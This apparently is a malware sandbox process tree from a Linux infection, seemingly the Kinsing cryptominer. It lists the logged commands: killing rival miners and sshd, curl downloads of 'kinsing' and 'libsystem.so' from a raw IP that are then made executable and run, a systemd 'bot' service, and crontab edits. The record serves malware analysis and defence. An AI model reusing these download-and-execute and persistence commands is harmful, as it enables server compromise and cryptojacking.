/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1435
-
-
/usr/bin/idid -u2⤵PID:1436
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:1437 -
/usr/sbin/sendmailsendmail -t3⤵PID:1440
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNW7-0000NE-QV4⤵
- Reads CPU attributes
PID:1456
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1443
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmNW7-0000NH-Q14⤵
- Reads CPU attributes
PID:1455
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1444
-
-
-
/usr/bin/idid -u2⤵PID:1445
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1446
-
-
/bin/unameuname -m2⤵PID:1447
-
-
/bin/lsls -la /etc/data2⤵PID:1449
-
-
/bin/grepgrep -e /dev2⤵PID:1450
-
-
/bin/grepgrep -v grep2⤵PID:1451
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1452
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1453
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1457
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1458
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1459
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
PID:1460
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
PID:1461
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1464
-
-
/bin/grepgrep :14142⤵PID:1466
-
-
/bin/grepgrep -v -2⤵PID:1469
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1470
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1467
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1468
-
-
/bin/grepgrep -v grep2⤵PID:1473
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1474
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1472
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1475
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1471
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/bin/grepgrep stratum2⤵PID:1477
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1479
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1476
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/bin/grepgrep -v grep2⤵PID:1483
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1484
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1485
-
-
/bin/grepgrep Sofia2⤵PID:1482
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1481
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1486
-
-
/bin/grepgrep -v grep2⤵PID:1489
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1491
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1487
-
-
/bin/grepgrep tracepath2⤵PID:1488
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1490
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1496
-
-
/bin/grepgrep /dot2⤵PID:1493
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1492
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1498
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1497
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1503
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1502
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1505
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1506
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1510
-
-
/bin/grepgrep "bash -k"2⤵PID:1508
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1511
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1507
-
-
/bin/grepgrep -v grep2⤵PID:1514
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1515
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1516
-
-
/bin/grepgrep perfctl2⤵PID:1513
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1512
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1517
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1518
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1522
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/bin/grepgrep ./ll12⤵PID:1520
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1519
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1527
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/bin/grepgrep agetty2⤵PID:1525
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1524
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1533
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1532
-
-
/bin/grepgrep -v -2⤵PID:1534
-
-
/bin/grepgrep 207.38.87.62⤵PID:1531
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1535
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1538
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1537
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1539
-
-
/bin/grepgrep -v -2⤵PID:1540
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1541
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1543
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1544
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1545
-
-
/bin/grepgrep -v -2⤵PID:1546
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1547
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1549
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1550
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1551
-
-
/bin/grepgrep -v -2⤵PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1553
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1556
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1555
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1557
-
-
/bin/grepgrep -v -2⤵PID:1558
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1559
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1560
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1561
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1562
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1563
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1564
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1565
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1567
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1568
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1569
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1570
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1571
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
PID:1574
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1575
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
PID:1576
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1577
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
PID:1581
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1582
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1583
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵PID:1586
-
-
/bin/grepgrep -v grep2⤵PID:1589
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1590
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1591
-
-
/bin/grepgrep ./udp2⤵PID:1588
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1587
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1592
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1594
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1593
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1597
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1596
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1598
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1600
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1599
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1601
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1603
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1602
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1604
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1606
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1605
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1607
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1609
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1608
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1610
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1611
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1613
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1615
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1614
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1616
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1618
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1617
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1621
-
-
/bin/catcat /data/./oka.pid2⤵PID:1620
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1622
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1624
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1625
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1627
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1626
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1628
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1629
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1630
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1631
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1632
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1633
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1634
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1638
-
-
/bin/grepgrep -v grep2⤵PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1639
-
-
/bin/grepgrep ./oka2⤵PID:1636
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1635
-
-
/bin/grepgrep -v grep2⤵PID:1642
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1641
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1643
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1644
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1640
-
-
/bin/grepgrep -v bin2⤵PID:1647
-
-
/bin/grepgrep -v "\\["2⤵PID:1648
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1646
-
-
/bin/grepgrep -v "("2⤵PID:1649
-
-
/bin/grepgrep -v php-fpm2⤵PID:1650
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1645
-
-
/bin/grepgrep -v proxymap2⤵PID:1651
-
-
/bin/grepgrep -v postgres2⤵PID:1652
-
-
/bin/grepgrep -v postgrey2⤵PID:1653
-
-
/bin/grepgrep -v kinsing2⤵PID:1654
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1655
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1656
-
-
/bin/grepgrep -v bin2⤵PID:1659
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1658
-
-
/bin/grepgrep -v "\\["2⤵PID:1660
-
-
/bin/grepgrep -v "("2⤵PID:1661
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads runtime system information
PID:1657
-
-
/bin/grepgrep -v php-fpm2⤵PID:1662
-
-
/bin/grepgrep -v proxymap2⤵PID:1663
-
-
/bin/grepgrep -v postgres2⤵PID:1664
-
-
/bin/grepgrep -v postgrey2⤵PID:1665
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1666
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1667
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1668
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1669
-
-
/bin/grepgrep -v bin2⤵PID:1670
-
-
/bin/grepgrep -v "\\["2⤵PID:1671
-
-
/bin/grepgrep -v "("2⤵PID:1672
-
-
/bin/grepgrep -v php-fpm2⤵PID:1673
-
-
/bin/grepgrep -v proxymap2⤵PID:1674
-
-
/bin/grepgrep -v postgres2⤵PID:1675
-
-
/bin/grepgrep -v postgrey2⤵PID:1676
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1677
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1678
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1681
-
-
/bin/grepgrep -v grep2⤵PID:1680
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1683
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1679
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1682
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1687
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1686
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1688
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1689
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1690
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1691
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1695
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1694
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1698
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1699
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1700
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1701
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1702
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1706
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1705
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵
- Reads runtime system information
PID:1708
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1709
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1712
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1713
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1714
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1715
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1716
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1717
-
-
/usr/bin/idid -u2⤵PID:1719
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1720
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1733
-
-
/bin/sedsed /base64/d2⤵PID:1738
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1739
-
-
/usr/bin/crontabcrontab -l2⤵PID:1737
-
-
/bin/sedsed /_cron/d2⤵PID:1741
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1742
-
-
/usr/bin/crontabcrontab -l2⤵PID:1740
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1745
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1744
-
-
/usr/bin/crontabcrontab -l2⤵PID:1743
-
-
/bin/sedsed /update.sh/d2⤵PID:1747
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1748
-
-
/usr/bin/crontabcrontab -l2⤵PID:1746
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1751
-
-
/bin/sedsed /logo4/d2⤵PID:1750
-
-
/usr/bin/crontabcrontab -l2⤵PID:1749
-
-
/bin/sedsed /logo9/d2⤵PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1754
-
-
/bin/sedsed /logo0/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/bin/sedsed /logo/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/bin/sedsed /tor2web/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/bin/sedsed /jpg/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/bin/sedsed /png/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/bin/sedsed /tmp/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/usr/bin/crontabcrontab -l2⤵PID:1779
-
-
/bin/sedsed /pastebin/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/bin/sedsed /onion/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1789
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/bin/sedsed /shuf/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/bin/sedsed /ash/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/bin/sedsed /mr.sh/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:1802
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1812
-
-
/bin/sedsed /github/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1822
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1826
-
-
/usr/bin/crontabcrontab -l2⤵PID:1824
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1825
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1828
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1831
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1834
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/usr/bin/crontabcrontab -l2⤵PID:1833
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1840
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1841
-
-
/usr/bin/crontabcrontab -l2⤵PID:1839
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1843
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1844
-
-
/usr/bin/crontabcrontab -l2⤵PID:1842
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1847
-
-
/bin/sedsed /update.sh/d2⤵PID:1846
-
-
/usr/bin/crontabcrontab -l2⤵PID:1845
-
-
